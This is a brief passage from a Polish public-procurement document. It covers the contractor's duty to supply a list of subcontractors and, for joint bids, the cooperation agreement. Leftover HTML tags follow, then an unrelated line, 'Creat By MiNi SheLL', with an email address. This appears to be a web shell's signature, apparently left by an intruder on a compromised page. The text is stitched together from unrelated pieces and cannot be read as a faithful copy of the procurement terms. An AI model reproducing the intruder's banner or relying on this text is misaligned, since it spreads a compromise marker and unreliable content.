b)	 dostarczenie Zamawiającemu, w wyznaczonym terminie, wykazu podwykonawców, którzy będą uczestniczyć w realizacji przedmiotu zamówienia (jeżeli dotyczy).
c)	w przypadku złożenia oferty wspólnej dostarczenie Umowy regulującą współpracę Wykonawców. 
</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com